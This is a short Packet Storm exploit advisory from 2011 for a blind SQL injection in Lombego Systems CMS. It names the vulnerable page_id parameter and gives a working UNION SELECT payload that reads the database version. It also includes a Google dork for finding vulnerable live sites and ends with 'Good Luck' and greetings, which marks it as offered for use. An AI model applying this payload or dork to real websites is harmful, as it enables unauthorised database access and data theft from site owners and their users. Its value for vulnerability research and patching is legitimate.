Lombego Systems CMS SQL Injection

2011-06-26T00:00:00
ID PACKETSTORM:102584
Type packetstorm
Reporter Codeine
Modified 2011-06-26T00:00:00

Description

                                        
                                            `#########################################################  
# Title : Lombego Systems CMS Blind SQLI  
# Author: Codeine  
# Vendor: [Lombego Systems] http://www.lombego.de/  
# Email : f3codeine[at]yahoo[dot]com  
# Date : 06/25/2011  
# Dork : intext:"Powered by Lombego Systems" inurl:index.php?page_id=  
# Cat : PHP [SQli]   
#########################################################   
  
[*]Injecton Point:  
http://www.site.com/frontend/index.php?page_id='#  
  
[*]Exploit:  
http://www.site.com/frontend/index.php?page_id=-1 union select 1,2,3,@@version--  
  
>Good Luck<  
  
#########################################################  
# Greetz: Hidden  
# Enjoy ^_^  
#########################################################  
  
  
`